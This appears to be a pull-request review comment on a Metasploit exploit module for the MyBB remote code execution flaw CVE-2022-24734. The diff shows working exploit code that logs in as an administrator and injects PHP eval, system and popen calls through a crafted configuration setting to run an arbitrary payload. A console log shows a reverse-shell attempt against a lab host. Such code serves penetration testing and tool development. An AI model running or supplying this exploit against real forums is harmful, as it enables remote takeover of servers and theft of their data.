modules/exploits/multi/http/mybb_rce_cve_2022_24734.rb

```diff
@@ -0,0 +1,296 @@
+      fail_with(Failure::NoAccess, "#{peer} - Invalid credentials")
+    end
+
+    print_good('Login successful!')
+  end
+
+  def send_config_settings(method: 'GET', action: 'add', vars_get: {}, vars_post: {}, check_response: true)
+    req_hash = {
+      'uri' => normalize_uri(target_uri.path, '/admin/index.php'),
+      'method' => method,
+      'vars_get' => {
+        'module' => 'config-settings',
+        'action' => action
+      }.merge(vars_get)
+    }
+    req_hash['vars_post'] = vars_post unless vars_post.blank?
+    res = send_request_cgi(req_hash, datastore['WfsDelay'] > 0 ? datastore['WfsDelay'] : 2)
+    if check_response && res.nil?
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response")
+    end
+    res
+  end
+
+  def exploit
+    login
+
+    res = send_config_settings
+    if res.body.include?('Access Denied')
+      fail_with(Failure::NoAccess, "#{peer} - Supplied user doesn't have the rights to add a setting")
+    end
+
+    vprint_status('Adding a malicious settings')
+    doc = res.get_html_document
+    @my_post_key = doc.xpath('//input[@name="my_post_key"]/@value').text
+
+    case target['Type']
+    when :in_memory
+      execute_command(payload.encoded)
+    when :psh_memory
+      cmd = cmd_psh_payload(
+        payload.encoded,
+        payload_instance.arch.first,
+        { remove_comspec: true, encode_final_payload: true }
+      )
+      execute_command(cmd)
+    when :dropper
+      execute_cmdstager
+    end
+  rescue ::Rex::ConnectionError
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+  end
+
+  def send_payload(cmd)
+    vprint_status('Adding a crafted configuration setting entry with the payload')
+
+    case target['Platform']
+    when 'php'
+      cmd = cmd.gsub(/"/, '"' => '\\"')
+      cmd = cmd.gsub(/\$/, '$' => '\\$')
+      extra = "\" . eval(\"#{cmd}\") .\""
+    when 'win'
+      cmd = cmd.gsub(/'/, "'" => "\\'")
+      if target['Arch'] == ARCH_CMD
+        # Force cmd to run in the background (only works for `cmd`)
+        extra = "\" . pclose(popen('start /B #{cmd}', 'r')) .\""
+      else
+        extra = "\" . system('#{cmd}') .\""
+      end
+    else
+      cmd = cmd.gsub(/'/, "'" => "\\'")
+      extra = "\" . system('#{cmd} > /dev/null &') .\""
+    end
+
+    post_data = {
+      my_post_key: @my_post_key,
+      title: Rex::Text.rand_text_alpha(rand(8...16)),
+      description: Rex::Text.rand_text_alpha(rand(8...16)),
+      gid: 1,
+      disporder: '',
+      name: Rex::Text.rand_text_alpha(rand(8...16)),
+      type: "\tphp",
+      extra: extra,
+      value: Rex::Text.rand_text_alpha(rand(8...16))
+    }
+
+    res = send_config_settings(method: 'POST', vars_post: post_data)
+    unless res.code == 302
+      doc = res.get_html_document
+      err = doc.xpath('//div[@class="error"]').text
+      fail_with(Failure::Unknown, "#{peer} - Exploit didn't work. Reason: #{err}")
```

Comment:
```suggestion
      fail_with(Failure::Unknown, "#{peer} - The module expected a 302 response but received: #{res.code}. Exploit didn't work. Reason: #{err}")
```

During windows testing, before turning off firewall + threat protection, I wasn't receiving a shell and wasn't receiving a reason why. This might help others that find themselves in a similar situation. 

```
msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > run Verbose=true LHOST=172.16.199.1 RHOSTS=172.16.199.236 USERNAME=admin PASSWORD=admin

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] MyBB forum found running at /
[!] The service is running, but could not be validated.
[*] Attempting login
[+] Login successful!
[*] Adding a malicious settings
[*] Adding a crafted configuration setting entry with the payload
[-] Exploit aborted due to failure: unknown: 172.16.199.236:80 - Exploit didn't work. Reason:
[*] Exploit completed, but no session was created.
```